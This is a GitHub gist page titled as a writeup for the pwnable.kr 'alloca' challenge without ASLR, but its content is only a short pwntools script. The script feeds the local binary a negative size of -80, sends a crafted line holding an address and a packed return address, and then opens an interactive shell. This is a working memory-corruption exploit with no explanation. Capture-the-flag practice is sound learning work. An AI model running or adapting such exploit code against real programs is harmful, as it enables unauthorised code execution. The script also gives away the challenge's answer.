Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Select an option

  • Save spnow/c50aa287511096e546d229bfbe2e8edf to your computer and use it in GitHub Desktop.

Select an option

Save spnow/c50aa287511096e546d229bfbe2e8edf to your computer and use it in GitHub Desktop.
pwnable.kr alloca(No ASLR) writeup
from pwn import *

proc = process('alloca')
proc.sendline('-80')
proc.sendline('134525988'+',,,'+'\xab\x85\x04\x08')
proc.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment